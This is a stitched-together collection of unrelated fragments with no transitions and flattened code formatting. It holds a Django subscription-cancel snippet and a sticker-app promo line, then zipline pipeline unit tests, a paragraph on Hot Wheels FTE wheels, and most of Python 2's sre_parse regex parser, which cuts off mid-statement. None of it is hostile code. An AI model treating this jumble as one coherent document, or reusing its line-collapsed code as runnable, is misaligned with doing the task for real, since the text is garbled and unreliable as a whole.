subscription.stripe_cancel() subscription.delete() except Exception as e: print(e) return HttpResponseRedirect('/subscriptions/')
Funny LGBT Pride Sticker app: insight & download. Do you want to impress your friends? Now you can enhance your iMessages with Funny LGBT Pride Sticker.
""" Tests for Algorithms using the Pipeline API. """ from os.path import ( dirname, join, realpath, ) from nose_parameterized import parameterized import numpy as np from numpy import ( array, arange, full_like, float64, nan, uint32, ) from numpy.testing import assert_almost_equal import pandas as pd from pandas import ( concat, DataFrame, date_range, read_csv, Series, Timestamp, ) from six import iteritems, itervalues from trading_calendars import get_calendar from zipline.api import ( attach_pipeline, pipeline_output, get_datetime, ) from zipline.errors import ( AttachPipelineAfterInitialize, PipelineOutputDuringInitialize, NoSuchPipeline, DuplicatePipelineName, ) from zipline.finance.trading import SimulationParameters from zipline.lib.adjustment import MULTIPLY from zipline.pipeline import Pipeline, CustomFactor from zipline.pipeline.factors import VWAP from zipline.pipeline.data import USEquityPricing from zipline.pipeline.loaders.frame import DataFrameLoader from zipline.pipeline.loaders.equity_pricing_loader import ( USEquityPricingLoader, ) from zipline.testing import ( str_to_seconds ) from zipline.testing import create_empty_splits_mergers_frame from zipline.testing.fixtures import ( WithMakeAlgo, WithAdjustmentReader, WithBcolzEquityDailyBarReaderFromCSVs, ZiplineTestCase, ) from zipline.utils.pandas_utils import normalize_date TEST_RESOURCE_PATH = join( dirname(dirname(realpath(__file__))), # zipline_repo/tests 'resources', 'pipeline_inputs', ) def rolling_vwap(df, length): "Simple rolling vwap implementation for testing" closes = df['close'].values volumes = df['volume'].values product = closes * volumes out = full_like(closes, nan) for upper_bound in range(length, len(closes) + 1): bounds = slice(upper_bound - length, upper_bound) out[upper_bound - 1] = product[bounds].sum() / volumes[bounds].sum() return Series(out, index=df.index) class ClosesAndVolumes(WithMakeAlgo, ZiplineTestCase): START_DATE = pd.Timestamp('2014-01-01', tz='utc') END_DATE = pd.Timestamp('2014-02-01', tz='utc') dates = date_range(START_DATE, END_DATE, freq=get_calendar("NYSE").day, tz='utc') SIM_PARAMS_DATA_FREQUENCY = 'daily' DATA_PORTAL_USE_MINUTE_DATA = False # FIXME: This currently uses benchmark returns from the trading # environment. BENCHMARK_SID = None @classmethod def make_equity_info(cls): cls.equity_info = ret = DataFrame.from_records([ { 'sid': 1, 'symbol': 'A', 'start_date': cls.dates[10], 'end_date': cls.dates[13], 'exchange': 'NYSE', }, { 'sid': 2, 'symbol': 'B', 'start_date': cls.dates[11], 'end_date': cls.dates[14], 'exchange': 'NYSE', }, { 'sid': 3, 'symbol': 'C', 'start_date': cls.dates[12], 'end_date': cls.dates[15], 'exchange': 'NYSE', }, ]) return ret @classmethod def make_exchanges_info(cls, *args, **kwargs): return DataFrame({'exchange': ['NYSE'], 'country_code': ['US']}) @classmethod def make_equity_daily_bar_data(cls, country_code, sids): cls.closes = DataFrame( {sid: arange(1, len(cls.dates) + 1) * sid for sid in sids}, index=cls.dates, dtype=float, ) cls.volumes = cls.closes * 1000 for sid in sids: yield sid, DataFrame( { 'open': cls.closes[sid].values, 'high': cls.closes[sid].values, 'low': cls.closes[sid].values, 'close': cls.closes[sid].values, 'volume': cls.volumes[sid].values, }, index=cls.dates, ) @classmethod def init_class_fixtures(cls): super(ClosesAndVolumes, cls).init_class_fixtures() cls.first_asset_start = min(cls.equity_info.start_date) cls.last_asset_end = max(cls.equity_info.end_date) cls.assets = cls.asset_finder.retrieve_all(cls.asset_finder.sids) cls.trading_day = cls.trading_calendar.day # Add a split for 'A' on its second date. cls.split_asset = cls.assets[0] cls.split_date = cls.split_asset.start_date + cls.trading_day cls.split_ratio = 0.5 cls.adjustments = DataFrame.from_records([ { 'sid': cls.split_asset.sid, 'value': cls.split_ratio, 'kind': MULTIPLY, 'start_date': Timestamp('NaT'), 'end_date': cls.split_date, 'apply_date': cls.split_date, } ]) cls.default_sim_params = SimulationParameters( start_session=cls.first_asset_start, end_session=cls.last_asset_end, trading_calendar=cls.trading_calendar, emission_rate='daily', data_frequency='daily', ) def make_algo_kwargs(self, **overrides): return self.merge_with_inherited_algo_kwargs( ClosesAndVolumes, suite_overrides=dict( sim_params=self.default_sim_params, get_pipeline_loader=lambda column: self.pipeline_close_loader, ), method_overrides=overrides, ) def init_instance_fixtures(self): super(ClosesAndVolumes, self).init_instance_fixtures() # View of the data on/after the split. self.adj_closes = adj_closes = self.closes.copy() adj_closes.ix[:self.split_date, self.split_asset] *= self.split_ratio self.adj_volumes = adj_volumes = self.volumes.copy() adj_volumes.ix[:self.split_date, self.split_asset] *= self.split_ratio self.pipeline_close_loader = DataFrameLoader( column=USEquityPricing.close, baseline=self.closes, adjustments=self.adjustments, ) self.pipeline_volume_loader = DataFrameLoader( column=USEquityPricing.volume, baseline=self.volumes, adjustments=self.adjustments, ) def expected_close(self, date, asset): if date < self.split_date: lookup = self.closes else: lookup = self.adj_closes return lookup.loc[date, asset] def expected_volume(self, date, asset): if date < self.split_date: lookup = self.volumes else: lookup = self.adj_volumes return lookup.loc[date, asset] def exists(self, date, asset): return asset.start_date <= date <= asset.end_date def test_attach_pipeline_after_initialize(self): """ Assert that calling attach_pipeline after initialize raises correctly. """ def initialize(context): pass def late_attach(context, data): attach_pipeline(Pipeline(), 'test') raise AssertionError("Shouldn't make it past attach_pipeline!") algo = self.make_algo( initialize=initialize, handle_data=late_attach, ) with self.assertRaises(AttachPipelineAfterInitialize): algo.run() def barf(context, data): raise AssertionError("Shouldn't make it past before_trading_start") algo = self.make_algo( initialize=initialize, before_trading_start=late_attach, handle_data=barf, ) with self.assertRaises(AttachPipelineAfterInitialize): algo.run() def test_pipeline_output_after_initialize(self): """ Assert that calling pipeline_output after initialize raises correctly. """ def initialize(context): attach_pipeline(Pipeline(), 'test') pipeline_output('test') raise AssertionError("Shouldn't make it past pipeline_output()") def handle_data(context, data): raise AssertionError("Shouldn't make it past initialize!") def before_trading_start(context, data): raise AssertionError("Shouldn't make it past initialize!") algo = self.make_algo( initialize=initialize, handle_data=handle_data, before_trading_start=before_trading_start, ) with self.assertRaises(PipelineOutputDuringInitialize): algo.run() def test_get_output_nonexistent_pipeline(self): """ Assert that calling add_pipeline after initialize raises appropriately. """ def initialize(context): attach_pipeline(Pipeline(), 'test') def handle_data(context, data): raise AssertionError("Shouldn't make it past before_trading_start") def before_trading_start(context, data): pipeline_output('not_test') raise AssertionError("Shouldn't make it past pipeline_output!") algo = self.make_algo( initialize=initialize, handle_data=handle_data, before_trading_start=before_trading_start, ) with self.assertRaises(NoSuchPipeline): algo.run() @parameterized.expand([('default', None), ('day', 1), ('week', 5), ('year', 252), ('all_but_one_day', 'all_but_one_day'), ('custom_iter', 'custom_iter')]) def test_assets_appear_on_correct_days(self, test_name, chunks): """ Assert that assets appear at correct times during a backtest, with correctly-adjusted close price values. """ if chunks == 'all_but_one_day': chunks = ( self.dates.get_loc(self.last_asset_end) - self.dates.get_loc(self.first_asset_start) ) - 1 elif chunks == 'custom_iter': chunks = [] st = np.random.RandomState(12345) remaining = ( self.dates.get_loc(self.last_asset_end) - self.dates.get_loc(self.first_asset_start) ) while remaining > 0: chunk = st.randint(3) chunks.append(chunk) remaining -= chunk def initialize(context): p = attach_pipeline(Pipeline(), 'test', chunks=chunks) p.add(USEquityPricing.close.latest, 'close') def handle_data(context, data): results = pipeline_output('test') date = get_datetime().normalize() for asset in self.assets: # Assets should appear iff they exist today and yesterday. exists_today = self.exists(date, asset) existed_yesterday = self.exists(date - self.trading_day, asset) if exists_today and existed_yesterday: latest = results.loc[asset, 'close'] self.assertEqual(latest, self.expected_close(date, asset)) else: self.assertNotIn(asset, results.index) before_trading_start = handle_data algo = self.make_algo( initialize=initialize, handle_data=handle_data, before_trading_start=before_trading_start, ) # Run for a week in the middle of our data. algo.run() def test_multiple_pipelines(self): """ Test that we can attach multiple pipelines and access the correct output based on the pipeline name. """ def initialize(context): pipeline_close = attach_pipeline(Pipeline(), 'test_close') pipeline_volume = attach_pipeline(Pipeline(), 'test_volume') pipeline_close.add(USEquityPricing.close.latest, 'close') pipeline_volume.add(USEquityPricing.volume.latest, 'volume') def handle_data(context, data): closes = pipeline_output('test_close') volumes = pipeline_output('test_volume') date = get_datetime().normalize() for asset in self.assets: # Assets should appear iff they exist today and yesterday. exists_today = self.exists(date, asset) existed_yesterday = self.exists(date - self.trading_day, asset) if exists_today and existed_yesterday: self.assertEqual( closes.loc[asset, 'close'], self.expected_close(date, asset) ) self.assertEqual( volumes.loc[asset, 'volume'], self.expected_volume(date, asset) ) else: self.assertNotIn(asset, closes.index) self.assertNotIn(asset, volumes.index) column_to_loader = { USEquityPricing.close: self.pipeline_close_loader, USEquityPricing.volume: self.pipeline_volume_loader, } algo = self.make_algo( initialize=initialize, handle_data=handle_data, get_pipeline_loader=lambda column: column_to_loader[column], ) algo.run() def test_duplicate_pipeline_names(self): """ Test that we raise an error when we try to attach a pipeline with a name that already exists for another attached pipeline. """ def initialize(context): attach_pipeline(Pipeline(), 'test') attach_pipeline(Pipeline(), 'test') algo = self.make_algo(initialize=initialize) with self.assertRaises(DuplicatePipelineName): algo.run() class MockDailyBarSpotReader(object): """ A BcolzDailyBarReader which returns a constant value for spot price. """ def get_value(self, sid, day, column): return 100.0 class PipelineAlgorithmTestCase(WithMakeAlgo, WithBcolzEquityDailyBarReaderFromCSVs, WithAdjustmentReader, ZiplineTestCase): AAPL = 1 MSFT = 2 BRK_A = 3 ASSET_FINDER_EQUITY_SIDS = AAPL, MSFT, BRK_A ASSET_FINDER_EQUITY_SYMBOLS = 'AAPL', 'MSFT', 'BRK_A' START_DATE = Timestamp('2014', tz='UTC') END_DATE = Timestamp('2015', tz='UTC') SIM_PARAMS_DATA_FREQUENCY = 'daily' DATA_PORTAL_USE_MINUTE_DATA = False # FIXME: This currently uses benchmark returns from the trading # environment. BENCHMARK_SID = None ASSET_FINDER_COUNTRY_CODE = 'US' @classmethod def make_equity_daily_bar_data(cls, country_code, sids): resources = { cls.AAPL: join(TEST_RESOURCE_PATH, 'AAPL.csv'), cls.MSFT: join(TEST_RESOURCE_PATH, 'MSFT.csv'), cls.BRK_A: join(TEST_RESOURCE_PATH, 'BRK-A.csv'), } cls.raw_data = raw_data = { asset: read_csv(path, parse_dates=['day']).set_index('day') for asset, path in resources.items() } # Add 'price' column as an alias because all kinds of stuff in zipline # depends on it being present. :/ for frame in raw_data.values(): frame['price'] = frame['close'] return resources @classmethod def make_splits_data(cls): return DataFrame.from_records([ { 'effective_date': str_to_seconds('2014-06-09'), 'ratio': (1 / 7.0), 'sid': cls.AAPL, } ]) @classmethod def make_mergers_data(cls): return create_empty_splits_mergers_frame() @classmethod def make_dividends_data(cls): return pd.DataFrame(array([], dtype=[ ('sid', uint32), ('amount', float64), ('record_date', 'datetime64[ns]'), ('ex_date', 'datetime64[ns]'), ('declared_date', 'datetime64[ns]'), ('pay_date', 'datetime64[ns]'), ])) @classmethod def init_class_fixtures(cls): super(PipelineAlgorithmTestCase, cls).init_class_fixtures() cls.pipeline_loader = USEquityPricingLoader.without_fx( cls.bcolz_equity_daily_bar_reader, cls.adjustment_reader, ) cls.dates = cls.raw_data[cls.AAPL].index.tz_localize('UTC') cls.AAPL_split_date = Timestamp("2014-06-09", tz='UTC') cls.assets = cls.asset_finder.retrieve_all( cls.ASSET_FINDER_EQUITY_SIDS ) def make_algo_kwargs(self, **overrides): return self.merge_with_inherited_algo_kwargs( PipelineAlgorithmTestCase, suite_overrides=dict( get_pipeline_loader=lambda column: self.pipeline_loader, ), method_overrides=overrides, ) def compute_expected_vwaps(self, window_lengths): AAPL, MSFT, BRK_A = self.AAPL, self.MSFT, self.BRK_A # Our view of the data before AAPL's split on June 9, 2014. raw = {k: v.copy() for k, v in iteritems(self.raw_data)} split_date = self.AAPL_split_date split_loc = self.dates.get_loc(split_date) split_ratio = 7.0 # Our view of the data after AAPL's split. All prices from before June # 9 get divided by the split ratio, and volumes get multiplied by the # split ratio. adj = {k: v.copy() for k, v in iteritems(self.raw_data)} for column in 'open', 'high', 'low', 'close': adj[AAPL].ix[:split_loc, column] /= split_ratio adj[AAPL].ix[:split_loc, 'volume'] *= split_ratio # length -> asset -> expected vwap vwaps = {length: {} for length in window_lengths} for length in window_lengths: for asset in AAPL, MSFT, BRK_A: raw_vwap = rolling_vwap(raw[asset], length) adj_vwap = rolling_vwap(adj[asset], length) # Shift computed results one day forward so that they're # labelled by the date on which they'll be seen in the # algorithm. (We can't show the close price for day N until day # N + 1.) vwaps[length][asset] = concat( [ raw_vwap[:split_loc - 1], adj_vwap[split_loc - 1:] ] ).shift(1, self.trading_calendar.day) # Make sure all the expected vwaps have the same dates. vwap_dates = vwaps[1][self.AAPL].index for dict_ in itervalues(vwaps): # Each value is a dict mapping sid -> expected series. for series in itervalues(dict_): self.assertTrue((vwap_dates == series.index).all()) # Spot check expectations near the AAPL split. # length 1 vwap for the morning before the split should be the close # price of the previous day. before_split = vwaps[1][AAPL].loc[split_date - self.trading_calendar.day] assert_almost_equal(before_split, 647.3499, decimal=2) assert_almost_equal( before_split, raw[AAPL].loc[split_date - (2 * self.trading_calendar.day), 'close'], decimal=2, ) # length 1 vwap for the morning of the split should be the close price # of the previous day, **ADJUSTED FOR THE SPLIT**. on_split = vwaps[1][AAPL].loc[split_date] assert_almost_equal(on_split, 645.5700 / split_ratio, decimal=2) assert_almost_equal( on_split, raw[AAPL].loc[split_date - self.trading_calendar.day, 'close'] / split_ratio, decimal=2, ) # length 1 vwap on the day after the split should be the as-traded # close on the split day. after_split = vwaps[1][AAPL].loc[split_date + self.trading_calendar.day] assert_almost_equal(after_split, 93.69999, decimal=2) assert_almost_equal( after_split, raw[AAPL].loc[split_date, 'close'], decimal=2, ) return vwaps @parameterized.expand([ (True,), (False,), ]) def test_handle_adjustment(self, set_screen): AAPL, MSFT, BRK_A = assets = self.assets window_lengths = [1, 2, 5, 10] vwaps = self.compute_expected_vwaps(window_lengths) def vwap_key(length): return "vwap_%d" % length def initialize(context): pipeline = Pipeline() context.vwaps = [] for length in vwaps: name = vwap_key(length) factor = VWAP(window_length=length) context.vwaps.append(factor) pipeline.add(factor, name=name) filter_ = (USEquityPricing.close.latest > 300) pipeline.add(filter_, 'filter') if set_screen: pipeline.set_screen(filter_) attach_pipeline(pipeline, 'test') def handle_data(context, data): today = normalize_date(get_datetime()) results = pipeline_output('test') expect_over_300 = { AAPL: today < self.AAPL_split_date, MSFT: False, BRK_A: True, } for asset in assets: should_pass_filter = expect_over_300[asset] if set_screen and not should_pass_filter: self.assertNotIn(asset, results.index) continue asset_results = results.loc[asset] self.assertEqual(asset_results['filter'], should_pass_filter) for length in vwaps: computed = results.loc[asset, vwap_key(length)] expected = vwaps[length][asset].loc[today] # Only having two places of precision here is a bit # unfortunate. assert_almost_equal(computed, expected, decimal=2) # Do the same checks in before_trading_start before_trading_start = handle_data self.run_algorithm( initialize=initialize, handle_data=handle_data, before_trading_start=before_trading_start, sim_params=SimulationParameters( start_session=self.dates[max(window_lengths)], end_session=self.dates[-1], data_frequency='daily', emission_rate='daily', trading_calendar=self.trading_calendar, ) ) def test_empty_pipeline(self): # For ensuring we call before_trading_start. count = [0] def initialize(context): pipeline = attach_pipeline(Pipeline(), 'test') vwap = VWAP(window_length=10) pipeline.add(vwap, 'vwap') # Nothing should have prices less than 0. pipeline.set_screen(vwap < 0) def handle_data(context, data): pass def before_trading_start(context, data): context.results = pipeline_output('test') self.assertTrue(context.results.empty) count[0] += 1 self.run_algorithm( initialize=initialize, handle_data=handle_data, before_trading_start=before_trading_start, sim_params=SimulationParameters( start_session=self.dates[0], end_session=self.dates[-1], data_frequency='daily', emission_rate='daily', trading_calendar=self.trading_calendar, ) ) self.assertTrue(count[0] > 0) def test_pipeline_beyond_daily_bars(self): """ Ensure that we can run an algo with pipeline beyond the max date of the daily bars. """ # For ensuring we call before_trading_start. count = [0] current_day = self.trading_calendar.next_session_label( self.pipeline_loader.raw_price_reader.last_available_dt, ) def initialize(context): pipeline = attach_pipeline(Pipeline(), 'test') vwap = VWAP(window_length=10) pipeline.add(vwap, 'vwap') # Nothing should have prices less than 0. pipeline.set_screen(vwap < 0) def handle_data(context, data): pass def before_trading_start(context, data): context.results = pipeline_output('test') self.assertTrue(context.results.empty) count[0] += 1 self.run_algorithm( initialize=initialize, handle_data=handle_data, before_trading_start=before_trading_start, sim_params=SimulationParameters( start_session=self.dates[0], end_session=current_day, data_frequency='daily', emission_rate='daily', trading_calendar=self.trading_calendar, ) ) self.assertTrue(count[0] > 0) class PipelineSequenceTestCase(WithMakeAlgo, ZiplineTestCase): # run algorithm for 3 days START_DATE = pd.Timestamp('2014-12-29', tz='utc') END_DATE = pd.Timestamp('2014-12-31', tz='utc') ASSET_FINDER_COUNTRY_CODE = 'US' def get_pipeline_loader(self): raise AssertionError("Loading terms for pipeline with no inputs") def test_pipeline_compute_before_bts(self): # for storing and keeping track of calls to BTS and TestFactor.compute trace = [] class TestFactor(CustomFactor): inputs = () # window_length doesn't actually matter for this test case window_length = 1 def compute(self, today, assets, out): trace.append("CustomFactor call") def initialize(context): pipeline = attach_pipeline(Pipeline(), 'my_pipeline') test_factor = TestFactor() pipeline.add(test_factor, 'test_factor') def before_trading_start(context, data): trace.append("BTS call") pipeline_output('my_pipeline') self.run_algorithm( initialize=initialize, before_trading_start=before_trading_start, get_pipeline_loader=self.get_pipeline_loader, ) # All pipeline computation calls should occur before any BTS calls, # and the algorithm is being run for 3 days, so the first 3 calls # should be to the custom factor and the next 3 calls should be to BTS expected_result = ["CustomFactor call"] * 3 + ["BTS call"] * 3 self.assertEqual(trace, expected_result)
FTE or Faster Than Ever is a line of Hot Wheels Wheel Types. Cars with this wheel had special nickel-plated axles, reducing friction and increasing the car's speed. It is always the same "bronze" color. FTE wheels are essentially the same wheels as the OH5SP but differ in color and axle. Due to the additional operation of nickel-plating the axles, these wheels are more expensive to produce than wheels on normal axles. This may be the cause that as of 2014/2015 this wheel type isn't seen as much as in 2005/2006.
# # Secret Labs' Regular Expression Engine # # convert re-style regular expression to sre pattern # # Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved. # # See the sre.py file for information on usage and redistribution. # """Internal support module for sre""" # XXX: show string offset and offending character for all errors # this module works under 1.5.2 and later. don't use string methods import string, sys from sre_constants import * SPECIAL_CHARS = ".\\[{()*+?^$|" REPEAT_CHARS = "*+?{" DIGITS = tuple("0123456789") OCTDIGITS = tuple("01234567") HEXDIGITS = tuple("0123456789abcdefABCDEF") WHITESPACE = tuple(" \t\n\r\v\f") ESCAPES = { r"\a": (LITERAL, ord("\a")), r"\b": (LITERAL, ord("\b")), r"\f": (LITERAL, ord("\f")), r"\n": (LITERAL, ord("\n")), r"\r": (LITERAL, ord("\r")), r"\t": (LITERAL, ord("\t")), r"\v": (LITERAL, ord("\v")), r"\\": (LITERAL, ord("\\")) } CATEGORIES = { r"\A": (AT, AT_BEGINNING_STRING), # start of string r"\b": (AT, AT_BOUNDARY), r"\B": (AT, AT_NON_BOUNDARY), r"\d": (IN, [(CATEGORY, CATEGORY_DIGIT)]), r"\D": (IN, [(CATEGORY, CATEGORY_NOT_DIGIT)]), r"\s": (IN, [(CATEGORY, CATEGORY_SPACE)]), r"\S": (IN, [(CATEGORY, CATEGORY_NOT_SPACE)]), r"\w": (IN, [(CATEGORY, CATEGORY_WORD)]), r"\W": (IN, [(CATEGORY, CATEGORY_NOT_WORD)]), r"\Z": (AT, AT_END_STRING), # end of string } FLAGS = { # standard flags "i": SRE_FLAG_IGNORECASE, "L": SRE_FLAG_LOCALE, "m": SRE_FLAG_MULTILINE, "s": SRE_FLAG_DOTALL, "x": SRE_FLAG_VERBOSE, # extensions "t": SRE_FLAG_TEMPLATE, "u": SRE_FLAG_UNICODE, } # figure out best way to convert hex/octal numbers to integers try: int("10", 8) atoi = int # 2.0 and later except TypeError: atoi = string.atoi # 1.5.2 class Pattern: # master pattern object. keeps track of global attributes def __init__(self): self.flags = 0 self.open = [] self.groups = 1 self.groupdict = {} def opengroup(self, name=None): gid = self.groups self.groups = gid + 1 if name is not None: ogid = self.groupdict.get(name, None) if ogid is not None: raise error, ("redefinition of group name %s as group %d; " "was group %d" % (repr(name), gid, ogid)) self.groupdict[name] = gid self.open.append(gid) return gid def closegroup(self, gid): self.open.remove(gid) def checkgroup(self, gid): return gid < self.groups and gid not in self.open class SubPattern: # a subpattern, in intermediate form def __init__(self, pattern, data=None): self.pattern = pattern if data is None: data = [] self.data = data self.width = None def dump(self, level=0): nl = 1 for op, av in self.data: print level*" " + op,; nl = 0 if op == "in": # member sublanguage print; nl = 1 for op, a in av: print (level+1)*" " + op, a elif op == "branch": print; nl = 1 i = 0 for a in av[1]: if i > 0: print level*" " + "or" a.dump(level+1); nl = 1 i = i + 1 elif type(av) in (type(()), type([])): for a in av: if isinstance(a, SubPattern): if not nl: print a.dump(level+1); nl = 1 else: print a, ; nl = 0 else: print av, ; nl = 0 if not nl: print def __repr__(self): return repr(self.data) def __len__(self): return len(self.data) def __delitem__(self, index): del self.data[index] def __getitem__(self, index): return self.data[index] def __setitem__(self, index, code): self.data[index] = code def __getslice__(self, start, stop): return SubPattern(self.pattern, self.data[start:stop]) def insert(self, index, code): self.data.insert(index, code) def append(self, code): self.data.append(code) def getwidth(self): # determine the width (min, max) for this subpattern if self.width: return self.width lo = hi = 0L for op, av in self.data: if op is BRANCH: i = sys.maxint j = 0 for av in av[1]: l, h = av.getwidth() i = min(i, l) j = max(j, h) lo = lo + i hi = hi + j elif op is CALL: i, j = av.getwidth() lo = lo + i hi = hi + j elif op is SUBPATTERN: i, j = av[1].getwidth() lo = lo + i hi = hi + j elif op in (MIN_REPEAT, MAX_REPEAT): i, j = av[2].getwidth() lo = lo + long(i) * av[0] hi = hi + long(j) * av[1] elif op in (ANY, RANGE, IN, LITERAL, NOT_LITERAL, CATEGORY): lo = lo + 1 hi = hi + 1 elif op == SUCCESS: break self.width = int(min(lo, sys.maxint)), int(min(hi, sys.maxint)) return self.width class Tokenizer: def __init__(self, string): self.string = string self.index = 0 self.__next() def __next(self): if self.index >= len(self.string): self.next = None return char = self.string[self.index] if char[0] == "\\": try: c = self.string[self.index + 1] except IndexError: raise error, "bogus escape (end of line)" char = char + c self.index = self.index + len(char) self.next = char def match(self, char, skip=1): if char == self.next: if skip: self.__next() return 1 return 0 def get(self): this = self.next self.__next() return this def tell(self): return self.index, self.next def seek(self, index): self.index, self.next = index def isident(char): return "a" <= char <= "z" or "A" <= char <= "Z" or char == "_" def isdigit(char): return "0" <= char <= "9" def isname(name): # check that group name is a valid string if not isident(name[0]): return False for char in name: if not isident(char) and not isdigit(char): return False return True def _group(escape, groups): # check if the escape string represents a valid group try: gid = atoi(escape[1:]) if gid and gid < groups: return gid except ValueError: pass return None # not a valid group def _class_escape(source, escape): # handle escape code inside character class code = ESCAPES.get(escape) if code: return code code = CATEGORIES.get(escape) if code: return code try: if escape[1:2] == "x": # hexadecimal escape (exactly two digits) while source.next in HEXDIGITS and len(escape) < 4: escape = escape + source.get() escape = escape[2:] if len(escape) != 2: raise error, "bogus escape: %s" % repr("\\" + escape) return LITERAL, atoi(escape, 16) & 0xff elif escape[1:2] in OCTDIGITS: # octal escape (up to three digits) while source.next in OCTDIGITS and len(escape) < 5: escape = escape + source.get() escape = escape[1:] return LITERAL, atoi(escape, 8) & 0xff if len(escape) == 2: return LITERAL, ord(escape[1]) except ValueError: pass raise error, "bogus escape: %s" % repr(escape) def _escape(source, escape, state): # handle escape code in expression code = CATEGORIES.get(escape) if code: return code code = ESCAPES.get(escape) if code: return code try: if escape[1:2] == "x": # hexadecimal escape while source.next in HEXDIGITS and len(escape) < 4: escape = escape + source.get() if len(escape) != 4: raise ValueError return LITERAL, atoi(escape[2:], 16) & 0xff elif escape[1:2] == "0": # octal escape while source.next in OCTDIGITS and len(escape) < 4: escape = escape + source.get() return LITERAL, atoi(escape[1:], 8) & 0xff elif escape[1:2] in DIGITS: # octal escape *or* decimal group reference (sigh) if source.next in DIGITS: escape = escape + source.get() if (escape[1] in OCTDIGITS and escape[2] in OCTDIGITS and source.next in OCTDIGITS): # got three octal digits; this is an octal escape escape = escape + source.get() return LITERAL, atoi(escape[1:], 8) & 0xff # got at least one decimal digit; this is a group reference group = _group(escape, state.groups) if group: if not state.checkgroup(group): raise error, "cannot refer to open group" return GROUPREF, group raise ValueError if len(escape) == 2: return LITERAL, ord(escape[1]) except ValueError: pass raise error, "bogus escape: %s" % repr(escape) def _parse_sub(source, state, nested=1): # parse an alternation: a|b|c items = [] while 1: items.append(_parse(source, state)) if source.match("|"): continue if not nested: break if not source.next or source.match(")", 0): break else: raise error, "pattern not properly closed" if len(items) == 1: return items[0] subpattern = SubPattern(state) # check if all items share a common prefix while 1: prefix = None for item in items: if not item: break if prefix is None: prefix = item[0] elif item[0] != prefix: break else: # all subitems start with a common "prefix". # move it out of the branch for item in items: del item[0] subpattern.append(prefix) continue # check next one break # check if the branch can be replaced by a character set for item in items: if len(item) != 1 or item[0][0] != LITERAL: break else: # we can store this as a character set instead of a # branch (the compiler may optimize this even more) set = [] for item in items: set.append(item[0]) subpattern.append((IN, set)) return subpattern subpattern.append((BRANCH, (None, items))) return subpattern def _parse(source, state): # parse a simple pattern subpattern = SubPattern(state) while 1: if source.next in ("|", ")"): break # end of subpattern this = source.get() if this is None: break # end of pattern if state.flags & SRE_FLAG_VERBOSE: # skip whitespace and comments if this in WHITESPACE: continue if this == "#": while 1: this = source.get() if this in (None, "\n"): break continue if this and this[0] not in SPECIAL_CHARS: subpattern.append((LITERAL, ord(this))) elif this == "[": # character set set = [] ## if source.match(":"): ## pass # handle character classes if source.match("^"): set.append((NEGATE, None)) # check remaining characters start = set[:] while 1: this = source.get() if this == "]" and set != start: break elif this and this[0] == "\\": code1 = _class_escape(source, this) elif this: code1 = LITERAL, ord(this) else: raise error, "unexpected end of regular expression" if source.match("-"): # potential range this = source.get() if this == "]": if code1[0] is IN: code1 = code1[1][0] set.append(code1) set.append((LITERAL, ord("-"))) break elif this: if this[0] == "\\": code2 = _class_escape(source, this) else: code2 = LITERAL, ord(this) if code1[0] != LITERAL or code2[0] != LITERAL: raise error, "bad character range" lo = code1[1] hi = code2[1] if hi < lo: raise error, "bad character range" set.append((RANGE, (lo, hi))) else: raise error, "unexpected end of regular expression" else: if code1[0] is IN: code1 = code1[1][0] set.append(code1) # XXX: <fl> should move set optimization to compiler! if len(set)==1 and set[0][0] is LITERAL: subpattern.append(set[0]) # optimization elif len(set)==2 and set[0][0] is NEGATE and set[1][0] is LITERAL: subpattern.append((NOT_LITERAL, set[1][1])) # optimization else: # XXX: <fl> should add charmap optimization here subpattern.append((IN, set)) elif this and this[0] in REPEAT_CHARS: # repeat previous item if this == "?": min, max = 0, 1 elif this == "*": min, max = 0, MAXREPEAT elif this == "+": min, max = 1, MAXREPEAT elif this == "{": here = source.tell() min, max = 0, MAXREPEAT lo = hi = "" while source.next in DIGITS: lo = lo + source.get() if source.match(","): while source.next in DIGITS: hi = hi + source.get() else: hi = lo if not source.match("}"): subpattern.append((LITERAL, ord(this))) source.seek(here) continue if lo: min = atoi(lo) if hi: max = atoi(hi) if max < min: raise error, "bad repeat interval" else: raise error, "not supported" # figure out which item to repeat if subpattern: item = subpattern[-1:] else: item = None if not item or (len(item) == 1 and item[0][0] == AT): raise error, "nothing to repeat" if item[0][0] in (MIN_REPEAT, MAX_REPEAT): raise error, "multiple repeat" if source.match("?"): subpattern[-1] = (MIN_REPEAT, (min, max, item)) else: subpattern[-1] = (MAX_REPEAT, (min, max, item)) elif this == ".": subpattern.append((ANY, None)) elif this == "(": group = 1 name = None if source.match("?"): group = 0 # options if source.match("P"): # python extensions if source.match("<"): # named group: skip forward to end of name name = "" while 1: char = source.get() if char is None: raise error, "unterminated name" if char == ">": break name = name + char group = 1 if not isname(name): raise error, "bad character in group name" elif source.match("="): # named backreference name = "" while 1: char = source.get() if char is None: raise error, "unterminated name" if char == ")": break name = name + char if not isname(name): raise error, "bad character in group name" gid = state.groupdict.get(name) if gid is None: raise error, "unknown group name" subpattern.append((GROUPREF, gid)) continue else: char = source.get() if char is None: raise error, "unexpected end of pattern" raise error, "unknown specifier: ?P%s" % char elif source.match(":"): # non-capturing group group = 2 elif source.match("#"): # comment while 1: if source.next is None or source.next == ")": break source.get() if not source.match(")"): raise error, "unbalanced parenthesis" continue elif source.next in ("=", "!", "<"): # lookahead assertions char = source.get() dir = 1 if char == "<": if source.next not in ("=", "!"): raise error, "syntax error" dir = -1 # lookbehind char = source.get() p = _parse_sub(source, state) if not source.match(")"): raise error, "unbalanced parenthesis" if char == "=": subpattern.append((ASSERT, (dir, p))) else: subpattern.append((ASSERT_NOT, (dir, p))) continue else: # flags if not source.next in FLAGS: raise error, "unexpected end of pattern" while source.next in FLAGS: state.flags = state.flags | FLAGS[source.get()] if group: # parse group contents if group == 2: # anonymous group group = None else: group = state.opengroup(name) p = _parse_sub(source, state) if not source.match(")"): raise error, "unbalanced parenthesis" if group is not None: state.closegroup(group) subpattern.append((SUBPATTERN, (group, p))) else: while 1: char = source.get() if char is None: raise error, "unexpected end of pattern" if char == ")": break raise error, "unknown extension" elif this == "^": subpattern.append((AT, AT_BEGINNING)) elif this == "$": subpattern.append((AT, AT_END)) elif this and this[0] == "\\": code = _escape(source, this, state) subpattern.append(code) else: raise error, "parser error" return subpattern def parse(str, flags=0, pattern=None): # parse 're' pattern into list of (opcode, argument) tuples source = Tokenizer(str) if pattern is None: pattern = Pattern() pattern.flags = flags pattern.str = str p = _parse_sub(source, pattern, 0) tail = source.get() if tail == ")": raise error, "unbalanced parenthesis" elif tail: raise error, "bogus characters at end of regular expression" if flags & SRE_FLAG_DEBUG: p.dump() if not 